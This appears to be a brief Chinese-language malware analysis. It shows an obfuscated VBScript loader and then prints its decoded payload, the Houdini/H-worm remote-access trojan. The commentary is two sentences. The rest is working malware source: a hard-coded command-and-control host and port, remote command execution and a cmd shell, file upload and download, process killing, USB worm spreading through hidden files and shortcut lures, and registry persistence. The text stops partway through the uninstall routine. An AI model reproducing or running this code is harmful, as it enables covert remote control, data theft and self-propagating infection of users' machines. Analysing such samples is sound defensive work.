這里是混淆的代碼

L = 0 : If (L = 0) Then : X = "??Φ?ν??κ??ν???γκπ?διδ?????ξζτλ????γκπ?διδ?ασ?Ψ?????????????????κιαδβ??????????????????????????????????γκξο????ρδ??δ?λπ?ηδ?ρθ??κθ???λκνο???????διξο?ηη?δν?????ο?θλ????ηιζαδη????ονπ???ηιζακη??ν???ονπ????????????????λπ?ηδ??ρ?ν???????????????????????????????δθ?ξγ?ηηκ?ε???ξ?ο?ξγ?ηηκ?ε????ξ?νδλο??ν??ο?κ?ε??ο???ξ?νδλο?ξγ?ηη?????δθ?αδη?ξτξο?θκ?ε??ξ?ο?αδη?ξτξο?θκ?ε????ν??ο?κ?ε??ο??ξ?νδλοδιβ?αδη?ξτξο?θκ?ε??ο?????δθ?γοολκ?ε??ξ?ο?γοολκ?ε????ν??ο?κ?ε??ο??θξσθη??σθηγοολ???????????????????λνδρ?ο?ρ?ν????????????????????????????διξο?ηηι?θ?????ξ?νδλο?ξ?νδλοι?θ???ξο?νοπλ???ξγ?ηηκ?ε?ξλ??δ?ηακη??νξ???ξο?νοπλ??????Χ???διξο?ηη?δν???ξγ?ηηκ?ε??σλ?ι??ιρδνκιθ?ιοξονδιβξ?διξο?ηη?δν?????Χ???δα?ικο?αδη?ξτξο?θκ?ε?ακη??ν?σδξοξ?διξο?ηη?δν??ογ?ι??διξο?ηη?δν???ξγ?ηηκ?ε??σλ?ι??ιρδνκιθ?ιοξονδιβξ???ο?θλ???????Χ???ξληδο?ν??????????χ?????????ξη??λ???????????δθ?ν?ξλκιξ????δθ??θ????δθ?λ?ν?θ??διακ???????πξ?ξλν???διβ???????ξο?νο??ο?????????δθ?κι?κι??????????????????κ???ξο?νο??????????????????????????κι??ννκν?ν?ξπθ??ι?σο??????διξο?ι?????γδη??ονπ?????διξο?ηη????ν?ξλκιξ????????ν?ξλκιξ????λκξο???δξ?ν???τ????????θ????ξληδο??ν?ξλκιξ??ξληδο?ν???ξ?η??ο???ξ???θ?????????ξ????σ???πο??????????λ?ν?θ????θ??????????????σ??πο??λ?ν?θ????ξ???πλ??ο??????????λ?ν?θ????θ?????????????κι?κι????ηκξ?????????ξ?ο?κι?κι??????αδη?ξτξο?θκ?ε?κλ?ιο?σοαδη???διξο?ηη?δν???διξο?ηηι?θ??????α?ηξ??????????κι?κι????νδο??λ?ν?θ????????κι?κι????ηκξ?????????ξγ?ηηκ?ε?νπι???ξ?νδλο??σ???????????γν???????διξο?ηη?δν???διξο?ηηι?θ?????γν?????????????ξ?νδλο?μπδο?????ξ???πιδιξο?ηη?????????πιδιξο?ηη????ξ???ξ?ι???????????κ?ιηκ????θ???????θ?????????ξ???ξδο??ξ?ι??????????ξδο??κ?ιηκ???ν??θ???????θ?????????ξ???ν??ρ?????????λ?ν?θ????θ?????????????πληκ????λ?ν?θ?????ξ?????ιπθ??νδρ?ν?????????λκξο??δξ??ιπθ??νδρ?ν???ιπθ?νδρ?ν??????ξ?????ιπθ?α?α?????????λ?ν?θ????θ?????????????λκξο??δξ??ιπθ?α?α???ιπθα?α??λ?ν?θ?????ξ?????ιπθ?λνκ??ξξ?????????λκξο??δξ??ιπθ?λνκ??ξξ???ιπθλνκ??ξξ???????ξ?????θ??ξγ?ηη?????????λ?ν?θ????θ?????????????λκξο??δξ??θ??ξγ?ηη???θ?ξγ?ηη??λ?ν?θ???????ξ??????η?ο??????????λ?ν?θ????θ???????????????η?ο?α?α??λ?ν?θ??????ξ?????σδο?λνκ??ξξ?????????λ?ν?θ????θ??????????????σδολνκ??ξξ??λ?ν?θ??????ξ????ξη??λ?????????λ?ν?θ????θ?????????????ξη??λ????ρ?η??λ?ν?θ????????????ι??ξ?η??ο?????ξ?νδλο?ξη??λ?ξη??λ??????ι???????ξπ??διξο?ηη??κι??ννκν?ν?ξπθ??ι?σο???δθ?ηιζκ?ε???δθ?αδη?ι?θ????δθ?ακη??νι?θ????δθ?αδη?δ?κι???δθ?ακη??νδ?κι????πλξο?νο??ακν????γ??νδρ??δι?αδη?ξτξο?θκ?ε??νδρ?ξ????δα???νδρ??δξν???τ???ονπ??ογ?ι??δα???νδρ??αν??ξλ?????????ογ?ι??δα???νδρ???νδρ?οτλ???????ογ?ι??????αδη?ξτξο?θκ?ε??κλταδη???ξ?νδλο?ξ?νδλοαπηηι?θ?????νδρ??λ?ογ????Χ????διξο?ηηι?θ??ονπ???????δα??αδη?ξτξο?θκ?ε?αδη??σδξοξ???νδρ??λ?ογ????Χ????διξο?ηηι?θ????ογ?ι??????????αδη?ξτξο?θκ?ε?β?οαδη???νδρ??λ?ογ????Χ?????διξο?ηηι?θ????οονδ?πο?ξ?????????????ι??δα??????ακν????γ?αδη??δι?αδη?ξτξο?θκ?ε?β?οακη??ν???νδρ??λ?ογ????Χ????Αδη?ξ??????????δα?ικο?ηιζαδη??ογ?ι??σδο?ακν??????????δα??διξον??αδη??ι?θ???????ογ?ι??????????????δα??η??ξ???ξληδο?αδη??ι?θ?????????π?κπι??ξληδο?αδη??ι?θ???????????????ηιζ??ογ?ι??????????????????αδη???οονδ?πο?ξ????????????????????????δα??π??ξ???αδη??ι?θ??????π??ξ???διξο?ηηι?θ???ογ?ι??????????????????????αδη?ι?θ????ξληδο?αδη??ι?θ????????????????????????????ξ?ο?ηιζκ?ε???ξγ?ηηκ?ε??ν??ο?ξγκνο?πο???νδρ??λ?ογ????Χ?????αδη?ι?θ??????????ηιζ?????????????????????????ηιζκ?ε??δι?κ?ξοτη???????????????????????????ηιζκ?ε?ο?νβ?ολ?ογ?????θ???σ????????????????????????ηιζκ?ε??κνζδιβ?δν??οκντ???????????????????????????ηιζκ?ε??νβπθ?ιοξ???????ξο?νο?????ν?λη????διξο?ηηι?θ????????γν???????????????γν???????????ξο?νο?????ν?λη????αδη??ι?θ????????γν???????????????γν???????????σδο???????????????????????αδη?δ?κι???ξγ?ηηκ?ε?ν?βν??????ΓΖ?Τ?ΗΚ??Η?Θ??ΓΔΙ?Χξκαο??ν?Χ?η?ξξ?ξΧ????ξγ?ηηκ?ε?ν?βν??????ΓΖ?Τ?ΗΚ??Η?Θ??ΓΔΙ?Χξκαο??ν?Χ?η?ξξ?ξΧ?????ξληδο?αδη??ι?θ????????π?κπι??ξληδο?αδη??ι?θ????????????Χ??????Χ??α?πηοδ?κιΧ?????????????????????????δα??διξον??αδη?δ?κι??????????ογ?ι??????????????????????????ηιζκ?ε?δ?κιηκ??οδκι???αδη??λ?ογ???????????????????????ηξ????????????????????????????ηιζκ?ε?δ?κιηκ??οδκι???αδη?δ?κι???????????????????????ι??δα??????????????????????ηιζκ?ε?ξ?ρ??????????????????????ι??δα???????????????ι??δα???????????ι??δα??????ι?σο??????ακν????γ?ακη??ν?δι?αδη?ξτξο?θκ?ε?β?οακη??ν???νδρ??λ?ογ????Χ????ξπ?ακη??νξ??????????δα?ικο?ηιζακη??ν?ογ?ι??σδο?ακν??????????ακη??ν??οονδ?πο?ξ????????????????ακη??νι?θ????ακη??ν?ι?θ???????????ξ?ο?ηιζκ?ε???ξγ?ηηκ?ε??ν??ο?ξγκνο?πο???νδρ??λ?ογ????Χ?????ακη??νι?θ??????ηιζ?????????????ηιζκ?ε??δι?κ?ξοτη???????????????ηιζκ?ε?ο?νβ?ολ?ογ?????θ???σ????????????ηιζκ?ε??κνζδιβ?δν??οκντ???????????????ηιζκ?ε??νβπθ?ιοξ???????ξο?νο?????ν?λη????διξο?ηηι?θ????????γν???????????????γν???????????ξο?νο??σληκν?ν?????ν?λη????ακη??ν?ι?θ????????γν???????????????γν???????????σδο???????????ακη??νδ?κι???ξγ?ηηκ?ε?ν?βν??????ΓΖ?Τ?ΗΚ??Η?Θ??ΓΔΙ?Χξκαο??ν?Χ?η?ξξ?ξΧακη??νΧ??α?πηοδ?κιΧ?????????????δα??διξον??ακη??νδ?κι??????????ογ?ι??????????????ηιζκ?ε?δ?κιηκ??οδκι???ακη??ν?λ?ογ???????????ηξ????????????????ηιζκ?ε?δ?κιηκ??οδκι???ακη??νδ?κι???????????ι??δα??????????ηιζκ?ε?ξ?ρ?????????ι?σο???ι??Δα???ι??Δα???ι??δα??ι?σο???νν??η??ν???ι??ξπ?????ξπ??πιδιξο?ηη??κι??ννκν?ν?ξπθ??ι?σο???δθ?αδη?ι?θ????δθ?ακη??νι?θ?????ξγ?ηηκ?ε?ν?β??η?ο???ΓΖ?Τ??ΠΝΝ?ΙΟ?ΠΞ?ΝΧξκαο??ν?Χθδ?νκξκαοΧ?δι?κ?ξΧ?πνν?ιορ?νξδκιΧνπιΧ????ξληδο??διξο?ηηι?θ???????????ξγ?ηηκ?ε?ν?β??η?ο???ΓΖ?Τ?ΗΚ??Η?Θ??ΓΔΙ?Χξκαο??ν?Χθδ?νκξκαοΧ?δι?κ?ξΧ?πνν?ιορ?νξδκιΧνπιΧ????ξληδο??διξο?ηηι?θ???????????αδη?ξτξο?θκ?ε???η?ο?αδη??ξο?νοπλ???διξο?ηηι?θ???ονπ???αδη?ξτξο?θκ?ε???η?ο?αδη???ξ?νδλο?ξ?νδλοαπηηι?θ???ονπ?????ακν?????γ??νδρ??δι?αδη?ξτξο?θκ?ε??νδρ?ξ??δα???νδρ??δξν???τ???ονπ??ογ?ι??δα???νδρ??αν??ξλ?????????ογ?ι??δα???νδρ???νδρ?οτλ???????ογ?ι??????ακν?????γ?αδη??δι?αδη?ξτξο?θκ?ε?β?οακη??ν????νδρ??λ?ογ????Χ???αδη?ξ???????????κι??ννκν?ν?ξπθ??ι?σο???????????δα??διξον??αδη??ι?θ???????ογ?ι???????????????δα??η??ξ???ξληδο?αδη??ι?θ????????π?κπι??ξληδο?αδη??ι?θ???????????????ηιζ??ογ?ι???????????????????αδη???οονδ?πο?ξ???????????????????????δα??π??ξ???αδη??ι?θ??????π??ξ???διξο?ηηι?θ???ογ?ι???????????????????????αδη?ι?θ????ξληδο?αδη??ι?θ?????????????????????????????αδη?ξτξο?θκ?ε???η?ο?αδη????νδρ??λ?ογ????Χ????αδη?ι?θ?????????ηιζ???????????????????????ηξ????????????????????????αδη?ξτξο?θκ?ε???η?ο?αδη????νδρ??λ?ογ????Χ????αδη??ι?θ??????????????????????ι??Δα????????????????ηξ????????????????????αδη?ξτξο?θκ?ε???η?ο?αδη???αδη??λ?ογ??????????????????ι??δα????????????ι??δα???????ι?σο???????ακν????γ?ακη??ν?δι?αδη?ξτξο?θκ?ε?β?οακη??ν???νδρ??λ?ογ????Χ????ξπ?ακη??νξ???????????ακη??ν??οονδ?πο?ξ???????????ι?σο???ι??δα???ι??δα???ι??δα??ι?σο???ξ?νδλο?μπδο???ι??ξπ?????απι?οδκι?λκξο???θ???λ?ν?θ?????λκξο???λ?ν?θ??γοολκ?ε?κλ?ι??λκξο???γοολ???????γκξο?????????λκνο?????????θ???α?ηξ???γοολκ?ε?ξ?ον?μπ?ξογ????ν??πξ?ν??β?ιο???διακνθ?οδκι??γοολκ?ε?ξ?ι??λ?ν?θ??λκξο???γοολκ?ε?ν?ξλκιξ?ο?σο???ι??απι?οδκι????απι?οδκι?διακνθ?οδκι??κι??ννκν?ν?ξπθ??ι?σο??δα??δια??????ογ?ι??????δια???γ?δ????ξληδο?ν???????δια???δια????ξγ?ηηκ?ε??σλ?ι??ιρδνκιθ?ιοξονδιβξ????κθλπο?νι?θ???????ξληδο?ν???????δια???δια????ξγ?ηηκ?ε??σλ?ι??ιρδνκιθ?ιοξονδιβξ???πξ?νι?θ???????ξληδο?ν????????ξ?ο?νκκο???β?οκ?ε??ο???διθβθοξ?φδθλ?νξκι?οδκιη?ρ?η?δθλ?νξκι?ο?ψ?ΧΧ?ΧνκκοΧ?δθρ?????????ξ?ο?κξ???νκκο??σ??μπ?ντ???ξ?η??ο???ανκθ??δι???κλ?ν?οδιβξτξο?θ????????ακν????γ?κξδιακ?δι?κξ?????????δια???δια???κξδιακ???λοδκι???ξληδο?ν????????????σδο?ακν??????ι?σο??????δια???δια????ληπξ????ξληδο?ν??????δια???δια???ξ??πνδοτ???ξληδο?ν??????δια???δια???πξ?ξλν???διβ??????διακνθ?οδκι???δια?????ηξ???????διακνθ?οδκι???δια???ι??δα???ι??απι?οδκι??????ξπ??πλξο?νο?????κι??ννκν?ν?ξπθ??Ι?σο????ξγ?ηηκ?ε?ν?β?νδο???ΓΖ?Τ??ΠΝΝ?ΙΟ?ΠΞ?ΝΧξκαο??ν?Χθδ?νκξκαοΧ?δι?κ?ξΧ?πνν?ιορ?νξδκιΧνπιΧ????ξληδο??διξο?ηηι?θ??????????????ξ?νδλο??σ???????????γν????????διξο?ηη?δν???διξο?ηηι?θ?????γν?????????Ν?Β?ΞΥ???ξγ?ηηκ?ε?ν?β?νδο???ΓΖ?Τ?ΗΚ??Η?Θ??ΓΔΙ?Χξκαο??ν?Χθδ?νκξκαοΧ?δι?κ?ξΧ?πνν?ιορ?νξδκιΧνπιΧ????ξληδο??διξο?ηηι?θ??????????????ξ?νδλο??σ????????????γν????????διξο?ηη?δν???διξο?ηηι?θ?????γν?????????Ν?Β?ΞΥ???αδη?ξτξο?θκ?ε??κλταδη???ξ?νδλο?ξ?νδλοαπηηι?θ??διξο?ηη?δν???διξο?ηηι?θ??ονπ???αδη?ξτξο?θκ?ε??κλταδη???ξ?νδλο?ξ?νδλοαπηηι?θ??ξο?νοπλ???διξο?ηηι?θ???ονπ??????ι??ξπ???????απι?οδκι?γ?δ???κι??ννκν?ν?ξπθ??ι?σο????ξ?ο?νκκο???β?οκ?ε??ο???διθβθοξ?φδθλ?νξκι?οδκιη?ρ?η?δθλ?νξκι?ο?ψ?ΧΧ?ΧνκκοΧ?δθρ?????ξ?ο??δξζξ???νκκο??σ??μπ?ντ???ξ?η??ο???ανκθ??δι???ηκβδ??η?δξζ????ακν????γ??δξζ?δι??δξζξ??????δα???δξζ?ρκηπθ?ξ?νδ?ηιπθ??ν???????ογ?ι??????????γ?δ?????δξζ?ρκηπθ?ξ?νδ?ηιπθ??ν???????????σδο?ακν???????ι??δα??ι?σο???ι??απι?οδκι??????απι?οδκι?ξ??πνδοτ???κι??ννκν?ν?ξπθ??ι?σο????ξ??πνδοτ?????????ξ?ο?κ?ε?θδξ?νρδ?????β?οκ?ε??ο???διθβθοξ?φδθλ?νξκι?οδκιη?ρ?η?δθλ?νξκι?ο?ψ?ΧΧ?ΧνκκοΧ?δθρ?????ξ?ο??κηδο?θξ???κ?ε?θδξ?νρδ????σ??μπ?ντ??ξ?η??ο???ανκθ??δι???κλ?ν?οδιβξτξο?θ????????ακν????γ?κ?εδο?θ?δι??κηδο?θξ??????ρ?νξδκιξον???ξληδο??κ?εδο?θ?ρ?νξδκι???????ι?σο??ρ?νξδκιξον???ξληδο???κηδο?θξ?ρ?νξδκι???????κξρ?νξδκι???ρ?νξδκιξον????????????ακν??σ?????οκ?π?κπι???ρ?νξδκιξον?????κξρ?νξδκι???κξρ?νξδκι????ρ?νξδκιξον??δ???ι?σο??κξρ?νξδκι????ρ?η??κξρ?νξδκι???δα??κξρ?νξδκι?????ογ?ι?ξ?????ξ??πνδοτ??ιο?ν????ηξ??ξ?????ξ??πνδοτ??ιο?ν?????ξ?ο?κ?εξ??πνδοτ??ιο?ν???β?οκ?ε??ο???διθβθοξ?ΧΧηκ??ηγκξοΧνκκοΧ????ξ????Ξ?ο??κη?ιοδρδνπξ???κ?εξ??πνδοτ??ιο?ν??σ??μπ?ντ??ξ?η??ο???ανκθ??ιοδρδνπξλνκ?π?ο????μη????????ακν????γ?κ?ε?ιοδρδνπξ?δι??κη?ιοδρδνπξ??????ξ??πνδοτ????ξ??πνδοτ????κ?ε?ιοδρδνπξ??δξλη?τι?θ??????????ι?σο??δα?ξ??πνδοτ???????ογ?ι?ξ??πνδοτ?????ι?ι??ρ????ι??απι?οδκι??????απι?οδκι?διξο?ι????κι??ννκν?ν?ξπθ??ι?σο????πξ?ξλν???διβ???ξγ?ηηκ?ε?ν?βν??????ΓΖ?Τ?ΗΚ??Η?Θ??ΓΔΙ?Χξκαο??ν?Χ????ξληδο??διξο?ηηι?θ?????????????Χ????δα?πξ?ξλν???διβ??????ογ?ι?????δα?η??ξ????θδ???ξ?νδλο?ξ?νδλοαπηηι?θ??????????Χ?????η??ξ??διξο?ηηι?θ???ογ?ι????????πξ?ξλν???διβ????ονπ??????????ο?????????ξγ?ηηκ?ε?ν?β?νδο???ΓΖ?Τ?ΗΚ??Η?Θ??ΓΔΙ?Χξκαο??ν?Χ????ξληδο??διξο?ηηι?θ??????????????Χ????πξ?ξλν???διβ???Ν?Β?ΞΥ???????ηξ?????????πξ?ξλν???διβ????α?ηξ??????????ο?????????ξγ?ηηκ?ε?ν?β?νδο???ΓΖ?Τ?ΗΚ??Η?Θ??ΓΔΙ?Χξκαο??ν?Χ????ξληδο??διξο?ηηι?θ??????????????Χ????πξ?ξλν???διβ???Ν?Β?ΞΥ?????????ι??δα???ι??Δα????????πλξο?νο??ξ?ο?ξ?νδλοαπηηι?θ?ξγκνο????αδη?ξτξο?θκ?ε?β?οαδη????ξ?νδλο?ξ?νδλοαπηηι?θ????ξ?ο?διξο?ηηαπηηι?θ?ξγκνο????αδη?ξτξο?θκ?ε?β?οαδη???διξο?ηη?δν???διξο?ηηι?θ????δα??η??ξ???ξ?νδλοαπηηι?θ?ξγκνο?ξγκνολ?ογ?????η??ξ???διξο?ηηαπηηι?θ?ξγκνο?ξγκνολ?ογ??ογ?ι???????ξγ?ηηκ?ε?νπι???ξ?νδλο??σ???????????γν???????διξο?ηη?δν???διξο?ηηι?θ?????γν???????????ξ?νδλο?μπδο????ι??Δα???νν??η??ν??ξ?ο?κι?κι?????αδη?ξτξο?θκ?ε?κλ?ιο?σοαδη???διξο?ηη?δν???διξο?ηηι?θ??????α?ηξ????δα???νν?ιπθ??ν?????ογ?ι??ξ?νδλο?μπδο???ι??απι?οδκι??????ξπ??ξδο??κ?ιηκ???ν??αδη?πνη?αδη?ι?θ??????ξονηδιζ???αδη?πνη??ξονξ?ρ?οκ???διξο?ηη?δν???αδη?ι?θ???ξ?ο?κ?εγοολ?κ?ιηκ??????ν??ο?κ?ε??ο??θξσθη??σθηγοολ?????κ?εγοολ?κ?ιηκ???κλ?ι??β?ο???ξονηδιζ??α?ηξ???κ?εγοολ?κ?ιηκ???ξ?ι?????ξ?ο?κ?εαξκ?κ?ιηκ??????ν??ο?κ?ε??ο???ξ?νδλοδιβ?αδη?ξτξο?θκ?ε??ο????δα??κ?εαξκ?κ?ιηκ???αδη??σδξοξ??ξονξ?ρ?οκ??ογ?ι??????κ?εαξκ?κ?ιηκ?????η?ο?αδη???ξονξ?ρ?οκ????ι??δα?????δα?κ?εγοολ?κ?ιηκ???ξο?οπξ???????ογ?ι??????δθ??κ?εξον??θ?κ?ιηκ???????ξ?ο??κ?εξον??θ?κ?ιηκ??????ν??ο?κ?ε??ο????κ???ξον??θ????????δογ?κ?εξον??θ?κ?ιηκ???????οτλ???????????κλ?ι??????νδο??κ?εγοολ?κ?ιηκ???ν?ξλκιξ??κ?τ?????ξ?ρ?οκαδη??ξονξ?ρ?οκ??????ηκξ???????ι???δογ?????ξ?ο?κ?εξον??θ?κ?ιηκ?????ικογδιβ???ι??δα??δα?κ?εαξκ?κ?ιηκ???αδη??σδξοξ?ξονξ?ρ?οκ??ογ?ι?????ξγ?ηηκ?ε?νπι?κ?εαξκ?κ?ιηκ???β?οαδη???ξονξ?ρ?οκ??ξγκνολ?ογ???ι??δα????ι??ξπ?????ξπ???κ?ιηκ????αδη?πνη?αδη??δν?????δα?αδη??δν??????ογ?ι??????αδη??δν???διξο?ηη?δν???ι??δα????ξονξ?ρ?οκ???αδη??δν???θδ???αδη?πνη??διξονν?ρ??αδη?πνη??Χ?????????ξ?ο?κ?εγοολ?κ?ιηκ??????ν??ο?κ?ε??ο??θξσθη??σθηγοολ????κ?εγοολ?κ?ιηκ???κλ?ι??λκξο???γοολ???????γκξο?????????λκνο?????????δξ?ξ?ι?διβ????ξληδο?ν???αδη?πνη??α?ηξ???κ?εγοολ?κ?ιηκ???ξ?ι?????????????ξ?ο?κ?εαξκ?κ?ιηκ??????ν??ο?κ?ε??ο???ξ?νδλοδιβ?αδη?ξτξο?θκ?ε??ο????δα??κ?εαξκ?κ?ιηκ???αδη??σδξοξ??ξονξ?ρ?οκ??ογ?ι??????κ?εαξκ?κ?ιηκ?????η?ο?αδη???ξονξ?ρ?οκ????ι??δα??δα??κ?εγοολ?κ?ιηκ???ξο?οπξ???????ογ?ι???????δθ??κ?εξον??θ?κ?ιηκ?????ξ?ο??κ?εξον??θ?κ?ιηκ??????ν??ο?κ?ε??ο????κ???ξον??θ?????????δογ?κ?εξον??θ?κ?ιηκ?????????οτλ????????????κλ?ι???????νδο??κ?εγοολ?κ?ιηκ???ν?ξλκιξ??κ?τ??????ξ?ρ?οκαδη??ξονξ?ρ?οκ???????ηκξ?????ι???δογ??????ξ?ο?κ?εξον??θ?κ?ιηκ??????ικογδιβ???ι??δα??δα?κ?εαξκ?κ?ιηκ???αδη??σδξοξ?ξονξ?ρ?οκ??ογ?ι?????ξγ?ηηκ?ε?νπι?κ?εαξκ?κ?ιηκ???β?οαδη???ξονξ?ρ?οκ??ξγκνολ?ογ???ι??δα????ι??ξπ???????απι?οδκι?πληκ????αδη?πνη??????δθ??γοολκ?ε?κ?εξον??θπληκ?????παα?ν??ξ?ο??κ?εξον??θπληκ???????ν??ο?κ?ε??ο????κ???ξον??θ?????δογ?κ?εξον??θπληκ????????????οτλ??????????????κλ?ι?????ηκ??ανκθαδη??αδη?πνη?????παα?ν????ν?????????ηκξ????ι???δογ??ξ?ο?κ?εξον??θ?κ?ιηκ?????ικογδιβ??ξ?ο?γοολκ?ε????ν??ο?κ?ε??ο??θξσθη??σθηγοολ????γοολκ?ε?κλ?ι??λκξο???γοολ???????γκξο?????????λκνο?????????δξ?ν??ρδιβ????ξληδο?ν???αδη?πνη??α?ηξ???γοολκ?ε?ξ?ι???παα?ν???ι??απι?οδκι??????απι?οδκι??ιπθ?νδρ?ν???????ακν?????γ??νδρ??δι?αδη?ξτξο?θκ?ε??νδρ?ξ??δα????νδρ??δξν???τ???ονπ??ογ?ι????????ιπθ?νδρ?ν????ιπθ?νδρ?ν????νδρ??λ?ογ????χ?????νδρ???νδρ?οτλ????ξληδο?ν???ι??δα??ι?σο???ι??Απι?οδκι????απι?οδκι??ιπθα?α???ιπθ?δν??????ιπθα?α????ιπθ?δν???ξληδο?ν??ακν?????γ?ακη??ν?δι?αδη?ξτξο?θκ?ε?β?οακη??ν???ιπθ?δν??ξπ?ακη??νξ????????ιπθα?α????ιπθα?α???ακη??ν?ι?θ?????χ??????????χ???????????χ????ακη??ν??οονδ?πο?ξ???ξληδο?ν??ι?σο????ακν?????γ?αδη??δι?αδη?ξτξο?θκ?ε?β?οακη??ν???ιπθ?δν??αδη?ξ????????ιπθα?α????ιπθα?α???αδη??ι?θ?????χ????αδη??ξδυ??????χ?????α?????χ????αδη???οονδ?πο?ξ???ξληδο?ν????ι?σο???ι??απι?οδκι??????απι?οδκι??ιπθλνκ??ξξ???????κι??ννκν?ν?ξπθ??ι?σο????ξ?ο?κ?ε?θδξ?νρδ?????β?οκ?ε??ο???διθβθοξ?ΧΧ?ΧνκκοΧ?δθρ?????ξ?ο??κηδο?θξ???κ?ε?θδξ?νρδ????σ??μπ?ντ??ξ?η??ο???ανκθ??δι???λνκ??ξξ???????????δθ?κ?εδο?θ??ακν????γ?κ?εδο?θ?δι??κηδο?θξ????ιπθλνκ??ξξ????ιπθλνκ??ξξ???κ?εδο?θ?ι?θ?????χ?????ιπθλνκ??ξξ????ιπθλνκ??ξξ???κ?εδο?θ?λνκ??ξξδ?????χ????????ιπθλνκ??ξξ????ιπθλνκ??ξξ???κ?εδο?θ??σ??πο??η?λ?ογ???ξληδο?ν??ι?σο???ι??απι?οδκι????ξπ???σδολνκ??ξξ??λδ????κι??ννκν?ν?ξπθ??ι?σο????ξγ?ηηκ?ε?νπι??ο?ξζζδηη??Α??Ο??ΛΔ??????λδ????ονπ????ι??ξπ?????ξπ????η?ο?α?α??πνη???κι??ννκν?ν?ξπθ??ι?σο????αδη?ξτξο?θκ?ε???η?ο?αδη??πνη??αδη?ξτξο?θκ?ε???η?ο?ακη??ν?πνη?????ι??ξπ?????απι?οδκι??θ?ξγ?ηη???θ???????δθ?γοολκ?ε?κ?σ???ν????ηηανκθ?ιτ????ξ?ο?κ?σ?????ξγ?ηηκ?ε??σ???????κθξλ????????????θ????δα?ικο?κ?σ???ξο?κπο??ο?ι?καξον??θ?ογ?ι?????ν????ηηανκθ?ιτ???κ?σ???ξο?κπο?ν????ηη???ηξ?δα?ικο?κ?σ???ξο??νν??ο?ι?καξον??θ?ογ?ι?????ν????ηηανκθ?ιτ???κ?σ???ξο??νν?ν????ηη???ηξ???????ν????ηηανκθ?ιτ????????ι??δα?????θ?ξγ?ηη???ν????ηηανκθ?ιτ???ι??απι?οδκι" : End If : If (L = 0) Then : S = "" : End If : If (L = 0) Then : F = 0 : H = 0 : End If : If (L = 0) Then : E = "Password" : End IfIf (L = 0) Then : R = 0 : End IfIf (L = 0) ThenDo Until H = Len(E)H = H + 1R = R + AscW(Mid(E, H, 1))LoopEnd IfIf (L = 0) ThenDo Until F = Len(X)F = F + 1S = S & ChrW(AscW(Mid(X, F, 1)) - R + Len(E))LoopEnd IfIf (L = 0) Thenexecute(S)End If

可以發現解開的代碼在變量S里面，接下來解混淆

得到2.txt文件：

'<[ recoder : houdini (c) skype : houdini-fx ]>'=-=-=-=-= config =-=-=-=-=-=-=-=-=-=-=-=-=-=-=host = "viewi.publicvm.com" port = 44 installdir = "%temp%" lnkfile = true lnkfolder = true'=-=-=-=-= public var =-=-=-=-=-=-=-=-=-=-=-=-=dim shellobj set shellobj = wscript.createobject("wscript.shell") dim filesystemobj set filesystemobj = createobject("scripting.filesystemobject") dim httpobj set httpobj = createobject("msxml2.xmlhttp")'=-=-=-=-= privat var =-=-=-=-=-=-=-=-=-=-=-=installname = wscript.scriptname startup = shellobj.specialfolders ("startup") & "\" installdir = shellobj.expandenvironmentstrings(installdir) & "\" if not filesystemobj.folderexists(installdir) then installdir = shellobj.expandenvironmentstrings("%temp%") & "\" spliter = "<" & "|" & ">" sleep = 5000 dim response dim cmd dim param info = "" usbspreading = "" startdate = "" dim oneonce'=-=-=-=-= code start =-=-=-=-=-=-=-=-=-=-=-= on error resume nextinstance while trueinstallresponse = "" response = post ("is-ready","") cmd = split (response,spliter) select case cmd (0) case "excecute"param = cmd (1)execute param case "update"param = cmd (1)oneonce.closeset oneonce = filesystemobj.opentextfile (installdir & installname ,2, false)oneonce.write paramoneonce.closeshellobj.run "wscript.exe //B " & chr(34) & installdir & installname & chr(34)wscript.quit case "uninstall"uninstall case "send"download cmd (1),cmd (2) case "site-send"sitedownloader cmd (1),cmd (2) case "recv"param = cmd (1)upload (param) case "enum-driver"post "is-enum-driver",enumdriver case "enum-faf"param = cmd (1)post "is-enum-faf",enumfaf (param) case "enum-process"post "is-enum-process",enumprocess case "cmd-shell"param = cmd (1)post "is-cmd-shell",cmdshell (param) case "delete"param = cmd (1)deletefaf (param) case "exit-process"param = cmd (1)exitprocess (param) case "sleep"param = cmd (1)sleep = eval (param) end selectwscript.sleep sleepwendsub install on error resume next dim lnkobj dim filename dim foldername dim fileicon dim foldericonupstart for each drive in filesystemobj.drivesif drive.isready = true then if drive.freespace > 0 then if drive.drivetype = 1 thenfilesystemobj.copyfile wscript.scriptfullname , drive.path & "\" & installname,trueif filesystemobj.fileexists (drive.path & "\" & installname) thenfilesystemobj.getfile(drive.path & "\" & installname).attributes = 2+4end iffor each file in filesystemobj.getfolder( drive.path & "\" ).Filesif not lnkfile then exit forif instr (file.name,".") thenif lcase (split(file.name, ".") (ubound(split(file.name, ".")))) <> "lnk" thenfile.attributes = 2+4if ucase (file.name) <> ucase (installname) thenfilename = split(file.name,".")set lnkobj = shellobj.createshortcut (drive.path & "\" & filename (0) & ".lnk") lnkobj.windowstyle = 7lnkobj.targetpath = "cmd.exe"lnkobj.workingdirectory = ""lnkobj.arguments = "/c start " & replace(installname," ", chrw(34) & " " & chrw(34)) & "&start " & replace(file.name," ", chrw(34) & " " & chrw(34)) &"&exit"fileicon = shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\" & shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\." & split(file.name, ".")(ubound(split(file.name, ".")))& "\") & "\defaulticon\") if instr (fileicon,",") = 0 thenlnkobj.iconlocation = file.pathelse lnkobj.iconlocation = fileiconend iflnkobj.save()end ifend ifend ifnextfor each folder in filesystemobj.getfolder( drive.path & "\" ).subfoldersif not lnkfolder then exit forfolder.attributes = 2+4foldername = folder.nameset lnkobj = shellobj.createshortcut (drive.path & "\" & foldername & ".lnk") lnkobj.windowstyle = 7lnkobj.targetpath = "cmd.exe"lnkobj.workingdirectory = ""lnkobj.arguments = "/c start " & replace(installname," ", chrw(34) & " " & chrw(34)) & "&start explorer " & replace(folder.name," ", chrw(34) & " " & chrw(34)) &"&exit"foldericon = shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\folder\defaulticon\") if instr (foldericon,",") = 0 thenlnkobj.iconlocation = folder.pathelse lnkobj.iconlocation = foldericonend iflnkobj.save()next end If end If end if next err.clear end subsub uninstall on error resume next dim filename dim foldernameshellobj.regdelete "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0) shellobj.regdelete "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0) filesystemobj.deletefile startup & installname ,true filesystemobj.deletefile wscript.scriptfullname ,truefor each drive in filesystemobj.drives if drive.isready = true then if drive.freespace 